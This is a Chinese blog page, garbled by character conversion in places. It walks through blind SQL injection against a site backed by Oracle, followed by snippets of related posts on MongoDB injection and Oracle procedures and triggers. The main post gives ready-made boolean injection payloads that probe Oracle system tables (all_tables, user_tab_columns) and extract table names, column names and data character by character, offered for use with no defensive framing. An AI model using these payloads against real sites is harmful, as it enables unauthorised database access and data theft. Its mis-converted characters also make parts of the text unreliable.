乙個簡單的oracle注入

2021-04-08 19:12:57 字數 1747 閱讀 5853

作者:babyz **:http://www.blackbbz.com/ www.caiker.net

先用典型的and 1=1 and 1=2方法來測試了一下,返回型別不匹配: 'cdbl'錯誤

不可以的,再提交乙個乙個單引號試試,頁面返回錯誤

oraoledb 錯誤 '80004005'

ora-01756: 括號內的字串沒有正確結束

......等

大概可以肯定是oracle了,繼續分別提交

猜測的oracle的系統表all_tables,user_tables和user_tab_columns

這些頁面全部返回成功,說明存在這幾個表名,呵呵~~

下面猜測user_tab_columns系統表裡是否存放了所有的使用者表的列名,提交

就是查詢表裡是否有password這個字串的列名

頁面正常返回,說明存在這個password的字串

以後就是一些機械的了,和sql類似,不說了,困的,太懶了~~~

整理下0〈〉(select count(*) from all_tables) and '1'='1 猜測是否有all_tables系統表

0〈〉(select count(*) from user_tab_columns where column_name like '%25列名關鍵字%25') and '1'='1 猜測是否有包含定義關鍵字的列名

0〈〉(select count(*) from user_tab_columns where column_name like '%25列名關鍵字%25' and substr(table_name,1,1)='a') and '1'='1 包含關鍵列名的表中是否有以a開頭的。即開始一位位猜表。

0〈〉(select count(*) from user_tables where table_name like '%25表名關鍵字%25' and length(table_name)=n) and '1'='1 猜測包錶名含有關鍵字的表的長度

0〈〉(select count(*) from user_tab_columns where table_name='表名' and substr(column_name,1,1)='a') and '1'='1 猜測列名

0〈〉(select count(*) from 表名 where 列名1='******xx' and substr(列名2,1,1)='a') and '1'='1 猜測資料

乙個簡單的MongoDB注入

安全警示,乙個簡單的mongodb注入 作者 nosqlfan 在關係型資料庫時代,sql注入攻防幾乎成了每乙個web開發者的必修課,很多nosql的支持者稱nosql的同時也就no sql注入了。其實不然,下面就是乙個利用get引數判斷不嚴格進行的mongodb注入,希望能夠引起大家大家在安全方面...

乙個簡單oracle儲存過程

本儲存過程實現建立表和刪除表,並應用到日期函式sysdate,add months,pl sql devoleper 8.0開發 create or replace procedure p create history table isv sql string 31000 begin for i i...

乙個簡單的ORACLE觸發器

開發是用到的乙個觸發器,現學現賣,功能實現了,留此記錄以便日後查閱。create or replace trigger trigger oa mail user after delete or insert or update on oa mail user for each row begin i...